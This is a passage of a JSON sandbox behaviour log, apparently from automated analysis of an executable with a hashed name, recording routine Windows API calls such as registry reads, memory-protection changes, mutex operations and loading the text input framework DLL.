"id": 388 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1ffd3c13b7bd7f498e8.exe" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1ffd3c13b7bd7f498e8.exe" } ], "repeated": 0, "id": 389 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 390 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 391 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 392 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7574d000" }, { "name": "ModuleName", "value": "IMM32.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 393 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a671a", "parentcaller": "0x7650fbe9", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 394 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a6741", "parentcaller": "0x7650fbe9", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 395 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x75686525", "parentcaller": "0x7567fe71", "category": "misc", "api": "ChangeWindowMessageFilter", "status": true, "return": "0x00000001", "arguments": [ { "name": "message", "value": "49246" }, { "name": "dwFlag", "value": "1" } ], "repeated": 0, "id": 396 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x7568654b", "parentcaller": "0x7567fe71", "category": "misc", "api": "ChangeWindowMessageFilter", "status": true, "return": "0x00000001", "arguments": [ { "name": "message", "value": "49247" }, { "name": "dwFlag", "value": "1" } ], "repeated": 0, "id": 397 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a671a", "parentcaller": "0x7650fbe9", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 398 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a6741", "parentcaller": "0x7650fbe9", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 1, "id": 399 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a6741", "parentcaller": "0x7651129a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 400 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e0fd5", "parentcaller": "0x7568474c", "category": "synchronization", "api": "NtOpenMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" }, { "name": "MutexName", "value": "Local\\MSCTF.Asm.MutexDefault1" } ], "repeated": 0, "id": 401 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 402 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" }, { "name": "Milliseconds", "value": "2000" } ], "repeated": 0, "id": 403 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764debcd", "parentcaller": "0x75684875", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000290" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "Local\\CTF.AsmListCache.FMPDefault1" } ], "repeated": 0, "id": 404 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764fc39b", "parentcaller": "0x75684892", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000290" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023e0000" }, { "name": "SectionOffset", "value": "0x0019e3cc" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 405 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764fcca5", "parentcaller": "0x75684caa", "category": "process", "api": "NtUnmapViewOfSectionEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023e0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Flags", "value": "0" } ], "repeated": 0, "id": 406 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e254a", "parentcaller": "0x75684cbb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 407 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764de6a0", "parentcaller": "0x75684cf4", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 1, "id": 408 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 409 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1ffd3c13b7bd7f498e8.exe" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\Compatibility\\f1ffd3c13b7bd7f498e8.exe" } ], "repeated": 0, "id": 410 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x7568975e", "parentcaller": "0x7568ade6", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x040a0c0a", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 1, "id": 411 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x75689155", "parentcaller": "0x756870f4", "category": "misc", "api": "GetSystemMetrics", "status": false, "return": "0x00000000", "arguments": [ { "name": "SystemMetricIndex", "value": "8192" } ], "repeated": 0, "id": 412 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e0fd5", "parentcaller": "0x7568959b", "category": "synchronization", "api": "NtOpenMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" }, { "name": "MutexName", "value": "CicLoadWinStaWinSta0" } ], "repeated": 0, "id": 413 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e254a", "parentcaller": "0x756895a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 414 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e0fd5", "parentcaller": "0x7568922d", "category": "synchronization", "api": "NtOpenMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" }, { "name": "MutexName", "value": "Local\\MSCTF.CtfMonitorInstMutexDefault1" } ], "repeated": 0, "id": 415 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e254a", "parentcaller": "0x75689238", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 416 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 417 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\OOBE" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\OOBE" } ], "repeated": 0, "id": 418 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000028c" }, { "name": "ValueName", "value": "LaunchUserOOBE" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\OOBE\\LaunchUserOOBE" } ], "repeated": 0, "id": 419 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f46db", "parentcaller": "0x764f2eda", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 420 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a016f", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 421 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a01a4", "parentcaller": "0x771a0064", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75718000" }, { "name": "ModuleName", "value": "MSCTF.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 422 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b81f9", "parentcaller": "0x76f5d0b9", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 423 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x7568b148", "parentcaller": "0x75689dd3", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a8" } ], "repeated": 0, "id": 424 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 425 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x76537309", "parentcaller": "0x764f39ee", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000002a8" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\OOBE" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\OOBE" } ], "repeated": 0, "id": 426 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x000002a8" }, { "name": "ValueName", "value": "LaunchUserOOBE" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\OOBE\\LaunchUserOOBE" } ], "repeated": 0, "id": 427 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f46db", "parentcaller": "0x764f2eda", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a8" } ], "repeated": 0, "id": 428 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e0bbf", "parentcaller": "0x756687f0", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 429 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x7569fbe1", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 430 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x7569f967", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 431 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x7569fc33", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 432 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x7569f151", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 433 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x7569fb8e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 434 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f956a", "parentcaller": "0x75668b5e", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 435 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e15a7", "parentcaller": "0x75669cb8", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x000002ac" }, { "name": "MutexName", "value": "Local\\SM0:9224:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 436 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x75669fa3", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002ac" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 437 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 438 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e2689", "parentcaller": "0x764e25e2", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 439 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764e254a", "parentcaller": "0x75670bde", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 440 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764de6a0", "parentcaller": "0x75670bae", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002ac" } ], "repeated": 1, "id": 441 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "textinputframework.dll" } ], "repeated": 0, "id": 442 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\textinputframework.dll" } ], "repeated": 0, "id": 443 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771aeb5c", "parentcaller": "0x771ae6d2", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b0" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\textinputframework.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 444 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771aeb99", "parentcaller": "0x771ae6d2", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000002b0" } ], "repeated": 0, "id": 445 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73120000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x000b9000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 446 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a02af", "parentcaller": "0x771a0a34", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731ce000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 447 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 448 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 449 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x731cc000" }, { "name": "ModuleName", "value": "textinputframework.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 450 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "CoreUIComponents.dll" } ], "repeated": 0, "id": 451 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "CoreMessaging.dll" } ], "repeated": 0, "id": 452 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771aebed", "parentcaller": "0x771ae6d2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 453 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771aebf5", "parentcaller": "0x771ae6d2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 454 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": 